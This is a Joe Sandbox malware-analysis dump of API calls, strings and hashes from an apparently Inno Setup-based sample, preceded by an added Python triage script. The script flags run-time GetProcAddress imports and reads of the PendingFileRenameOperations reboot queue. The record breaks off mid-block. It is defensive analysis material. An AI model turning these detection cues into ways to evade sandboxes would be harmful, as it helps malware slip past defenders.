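Added example, not part of the Joe Sandbox report: a small Python triage script that parses function blocks in the layout above into records and pulls out the two things a reviewer would note in these particular blocks. The first is run-time import resolution, where GetProcAddress or GetModuleHandleA appears in the API list and the name being resolved (RegDeleteKeyExA, SfcIsFileProtected, SHAutoComplete) sits in the block's String ID. The second is registry access to SYSTEM\CurrentControlSet\Control\Session Manager and its PendingFileRenameOperations values, the list Windows uses to queue file moves and deletes until the next reboot (MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT). The sample text is constructed from two of the blocks above with the identical Memory Dump Source lines dropped; the header names and field patterns are assumptions about this report's layout. That the surrounding strings (PrepareToInstall failed, NextButtonClick, Need to restart Windows?, Creating directory) look like an Inno Setup installer's own log messages is an inference from their wording, not something the report states, so the findings below are pointers to functions worth opening in the IDA snapshot, not a verdict.

```python
import re
from dataclasses import dataclass, field

# Section headers as they appear in the report's per-function blocks (assumed layout).
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
                    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})$")
STR_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<xref>[0-9A-F]{8})$")
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+):\s*(?P<value>.*)$")

# APIs that resolve further imports at run time; the resolved name lands in the
# block's String ID, so the two are joined in triage().
RESOLVERS = {"GetProcAddress", "LoadLibraryA", "LoadLibraryW", "GetModuleHandleA"}
# Session Manager values Windows uses to queue file renames/deletes until the next
# reboot (MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT); worth a look in any installer or loader.
REBOOT_QUEUE_VALUES = {"PendingFileRenameOperations", "PendingFileRenameOperations2"}

# Constructed sample: two blocks in the report's layout, Memory Dump Source lines omitted.
SAMPLE = r"""
APIs
• RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE48
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000), ref: 0042DE63
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE69
Strings
Similarity
• API ID: AddressDeleteHandleModuleProc
• String ID: RegDeleteKeyExA$advapi32.dll
• API String ID: 588496660-1846899949
• Instruction Fuzzy Hash: B2E06DF1B41B30AAD72426697C8AFA72728DB74365F618537B105AD1A183FC1C50CE9D
APIs
  • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F), ref: 0042DE30
• RegCloseKey.ADVAPI32(?,00455A4F,?,00000001,00000000), ref: 00455A42
Strings
• PendingFileRenameOperations, xrefs: 00455A14
• PendingFileRenameOperations2, xrefs: 00455A23
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004559F0
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
• API String ID: 47109696-2115312317
• Instruction Fuzzy Hash: 31F09671744A08EFDB04D6A6DC62E7A739DD744711FA04477F800D7682DA7DAD04962C
"""


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)     # (name, module, args, ref, subcall or None)
    strings: list = field(default_factory=list)  # (text, xref)
    meta: dict = field(default_factory=dict)     # Similarity key -> value

    def finished(self):
        # The Instruction Fuzzy Hash line is always the last line of a block.
        return "Instruction Fuzzy Hash" in self.meta


def parse_blocks(text):
    """Split report text into FunctionBlock records, one per function."""
    blocks, cur, section = [], FunctionBlock(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            if cur.finished():          # a header after the hash line starts the next block
                blocks.append(cur)
                cur = FunctionBlock()
            section = line
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append((m["name"], m["module"], m["args"], m["ref"], m["sub"]))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append((m["text"], m["xref"]))
        elif section == "Similarity" and (m := KV_RE.match(line)):
            cur.meta[m["key"]] = m["value"]
    if cur.apis or cur.strings or cur.meta:
        blocks.append(cur)
    return blocks


def triage(block):
    """Findings for one block; an empty list means nothing to look at."""
    findings = []
    names = {api[0] for api in block.apis}
    resolved = [s for s in block.meta.get("String ID", "").split("$")
                if s and not s.lower().endswith(".dll")]
    if names & RESOLVERS and resolved:
        findings.append("run-time import of " + ", ".join(resolved))
    for name, _module, args, ref, _sub in block.apis:
        if "currentcontrolset" in args.lower():
            key = next(a for a in args.split(",") if "currentcontrolset" in a.lower())
            findings.append(f"{name} on {key} @ {ref}")
    for text, xref in block.strings:
        if text in REBOOT_QUEUE_VALUES:
            findings.append(f"reads reboot rename queue {text} @ {xref}")
        elif "currentcontrolset" in text.lower():
            findings.append(f"registry path {text} @ {xref}")
    return findings


if __name__ == "__main__":
    for block in parse_blocks(SAMPLE):
        for finding in triage(block):
            print(f"[{block.meta.get('API ID') or '-'}] {finding}")
```

Feed it the full text dump of the report rather than the two sample blocks; functions with no findings stay silent, which leaves a short list of ref addresses to open in the hcaresult snapshot. Resolving RegDeleteKeyExA, SfcIsFileProtected or SHAutoComplete through GetProcAddress is also how a legitimate installer stays loadable on Windows versions that lack those exports, so treat the run-time import finding as a place to look, not as evidence of evasion on its own.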
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?,00000000), ref: 0047F3E6
                                                                          • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?), ref: 0047F3F3
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749), ref: 0047F4E8
                                                                          • FindClose.KERNEL32(000000FF,0047F513,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?), ref: 0047F506
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID:
                                                                          • API String ID: 2066263336-0
                                                                          • Opcode ID: b461a46803c2cc4ea78060a2329edfdb5f867b3d72b18562307b1542635c1f41
                                                                          • Instruction ID: 93840f20d66fcb2e286325320114c4d74e835c6895e54ad5a4f30f132b089a3b
                                                                          • Opcode Fuzzy Hash: b461a46803c2cc4ea78060a2329edfdb5f867b3d72b18562307b1542635c1f41
                                                                          • Instruction Fuzzy Hash: 19512F71A00658AFCB21DF65CC45ADEB7B8EB48319F5084BAA818E7341D7389F49CF54
                                                                          APIs
                                                                          • GetMenu.USER32(00000000), ref: 00421359
                                                                          • SetMenu.USER32(00000000,00000000), ref: 00421376
                                                                          • SetMenu.USER32(00000000,00000000), ref: 004213AB
                                                                          • SetMenu.USER32(00000000,00000000), ref: 004213C7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Menu
                                                                          • String ID:
                                                                          • API String ID: 3711407533-0
                                                                          • Opcode ID: 2199c62fdc40b6f857ca540156f476da1cd3d0498d35d1cb2f117de972eee6cd
                                                                          • Instruction ID: 7bb7859a2cdb5f88754e70ccfd218d349751ef7fdbf43141b5448ef52fdf7b61
                                                                          • Opcode Fuzzy Hash: 2199c62fdc40b6f857ca540156f476da1cd3d0498d35d1cb2f117de972eee6cd
                                                                          • Instruction Fuzzy Hash: 0141B03070025456EB20EB3AA8857AB36D64F61308F4856BFBC44DF7A3CA7CCC5583A9
                                                                          APIs
                                                                          • SendMessageA.USER32(?,?,?,?), ref: 00416B7C
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00416B96
                                                                          • SetBkColor.GDI32(?,00000000), ref: 00416BB0
                                                                          • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BD8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Color$CallMessageProcSendTextWindow
                                                                          • String ID:
                                                                          • API String ID: 601730667-0
                                                                          • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                          • Instruction ID: 029c09512e86dc7a5584eefc6ebe6d25086567911d505253220d4c4c80a1b89b
                                                                          • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                          • Instruction Fuzzy Hash: D4114FB5304604AFD720EE6ECDC4E9777DCAF49310715882AB55ADB602C638F8418B39
                                                                          APIs
                                                                          • WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                                          • CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                          • String ID:
                                                                          • API String ID: 4071923889-0
                                                                          • Opcode ID: 51238a3311eee55e88becd6a870e4e93586b22fb22ba4d0d147ea6b118d6571c
                                                                          • Instruction ID: ae4672943cd7382c52be368afd98a0e744302f00d430d4f9e0a97d6bd95691cc
                                                                          • Opcode Fuzzy Hash: 51238a3311eee55e88becd6a870e4e93586b22fb22ba4d0d147ea6b118d6571c
                                                                          • Instruction Fuzzy Hash: 9C01F931A006087EEB10979D8C02F5B7BACDB89764F610127F904DB2C2C5789D408A68
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                                          • EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                                          • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A24620A480A570EnumFonts
                                                                          • String ID:
                                                                          • API String ID: 2630238358-0
                                                                          • Opcode ID: 9afbfd5fafda1dbd28af8ddef14be35d640b69e4e8358016454380424bd4bee6
                                                                          • Instruction ID: 69cee35535e214b40259e1ab78654d31e06b117eb7ed13cd681158bdd9fae355
                                                                          • Opcode Fuzzy Hash: 9afbfd5fafda1dbd28af8ddef14be35d640b69e4e8358016454380424bd4bee6
                                                                          • Instruction Fuzzy Hash: 2F01D2717442102AE700BF795CC6B9B36A4DF04318F40027BF808AB3C6D6BE9C0547AE
                                                                          APIs
                                                                            • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                                          • FlushFileBuffers.KERNEL32(?), ref: 0045C2B9
                                                                          Strings
                                                                          • NumRecs range exceeded, xrefs: 0045C1B6
                                                                          • EndOffset range exceeded, xrefs: 0045C1ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: File$BuffersFlush
                                                                          • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                          • API String ID: 3593489403-659731555
                                                                          • Opcode ID: 3fff9631741ed1f89243f20ac6f917f34f78f9adab0a30c84fb990f9f9a0694f
                                                                          • Instruction ID: f1827e02de76a306a1886b93aefbbb2344be70999cb9be9d3c0cbcfad0efad24
                                                                          • Opcode Fuzzy Hash: 3fff9631741ed1f89243f20ac6f917f34f78f9adab0a30c84fb990f9f9a0694f
                                                                          • Instruction Fuzzy Hash: 35616334A002548FDB25DF25C891ADAB7B5AF49305F0084DAED88AB353D7749EC9CF54
                                                                          APIs
                                                                            • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                                            • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                                            • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                                            • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                            • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                            • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                            • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                                            • Part of subcall function 00409B70: 6F551CD0.COMCTL32(004980D6), ref: 00409B70
                                                                            • Part of subcall function 0041094C: GetCurrentThreadId.KERNEL32 ref: 0041099A
                                                                            • Part of subcall function 00419038: GetVersion.KERNEL32(004980EA), ref: 00419038
                                                                            • Part of subcall function 0044F73C: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                                            • Part of subcall function 0044F73C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                                            • Part of subcall function 0044FBE4: GetVersionExA.KERNEL32(0049B790,00498103), ref: 0044FBF3
                                                                            • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                                            • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                                            • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                                            • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                                            • Part of subcall function 00456ED4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                                            • Part of subcall function 0046441C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                                            • Part of subcall function 0046441C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                                            • Part of subcall function 0046CC10: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                                            • Part of subcall function 004786B4: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                                            • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                                            • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                                            • Part of subcall function 004950C0: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 004950D9
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,00498178), ref: 0049814A
                                                                            • Part of subcall function 00497E74: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                                            • Part of subcall function 00497E74: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                                            • Part of subcall function 004244CC: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244EB
                                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                          • ShowWindow.USER32(?,00000005,00000000,00498178), ref: 004981AB
                                                                            • Part of subcall function 00481B8C: SetActiveWindow.USER32(?), ref: 00481C3A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                          • String ID: Setup
                                                                          • API String ID: 3870281231-3839654196
                                                                          • Opcode ID: c82cb4154b49966d52098e7678e9f8cbacc3d3e1a40bce85d329610fd5ea755b
                                                                          • Instruction ID: d0c772c7b00e67a50ac74b8b43c66aaf35bd51fc0d8445b6be8c1c392d06dbfc
                                                                          • Opcode Fuzzy Hash: c82cb4154b49966d52098e7678e9f8cbacc3d3e1a40bce85d329610fd5ea755b
                                                                          • Instruction Fuzzy Hash: 6E31A471208A409ED601BBB7ED53A293B98EF89B18B61447FF80482593DE3D5C158A7E
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DC34
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DCA4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID: 2H
                                                                          • API String ID: 3660427363-1900415311
                                                                          • Opcode ID: 14541883276540ac7989a720439aace4da052e0d2dc9232dcf0108ce5bd41f35
                                                                          • Instruction ID: 6f29e5db34dee79be2e4bdbc2feb63702d0df34b1de6f6cc3bdc936bcd48876b
                                                                          • Opcode Fuzzy Hash: 14541883276540ac7989a720439aace4da052e0d2dc9232dcf0108ce5bd41f35
                                                                          • Instruction Fuzzy Hash: 88414271E04529ABDB11DF95D881BAFB7B8EF05704FA18466E800F7241D778EE01CBA9
                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A3E
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A47
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: .tmp
                                                                          • API String ID: 1375471231-2986845003
                                                                          • Opcode ID: 78f230c1c23ee00a09b91ad4e0d90e969b8545f4e864f0322f10b99bd95edb86
                                                                          • Instruction ID: 5c47afe113f3b23246b8f03ea8338b9bfcdda488aecdb3892d8cb76e5c942ae9
                                                                          • Opcode Fuzzy Hash: 78f230c1c23ee00a09b91ad4e0d90e969b8545f4e864f0322f10b99bd95edb86
                                                                          • Instruction Fuzzy Hash: 4A213374A00218ABDB01EFA5C8529DFB7B9EF48305F50457BE801B7342DA7C9F059BA9
                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C10E,00000000,0047C124,?,?,?,?,00000000), ref: 0047BEEA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: RegisteredOrganization$RegisteredOwner
                                                                          • API String ID: 3535843008-1113070880
                                                                          • Opcode ID: 27ab63dfb5301e991ca37986a8aa3ba83a7bb1c6c96b168b2a63f47a98e3c08c
                                                                          • Instruction ID: 7ba728e1ef3f38ce6dcb00f7549556e1698566df6bc9e7584ed9d3abf6b47640
                                                                          • Opcode Fuzzy Hash: 27ab63dfb5301e991ca37986a8aa3ba83a7bb1c6c96b168b2a63f47a98e3c08c
                                                                          • Instruction Fuzzy Hash: 2CF09060704244AFEB00E665DC92BEA33A9D745304F20803BE2048B392D779AE00CB5C
                                                                          APIs
                                                                          • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: Inno Setup: Setup Version$r_G
                                                                          • API String ID: 3702945584-2380526977
                                                                          • Opcode ID: b48b0372e97a4200f87fd252dff6264bc446dea2a7e948ac8a811b1755729780
                                                                          • Instruction ID: ba068d84db82e82ca1a3bed1356aff977b130b22b64274b732cbd5037cad883f
                                                                          • Opcode Fuzzy Hash: b48b0372e97a4200f87fd252dff6264bc446dea2a7e948ac8a811b1755729780
                                                                          • Instruction Fuzzy Hash: 7DE06D753012047FD710AA2F9C85F5BBADCDF88765F10403AB908DB392D978DD0181A9
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475059
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047526B), ref: 00475070
                                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
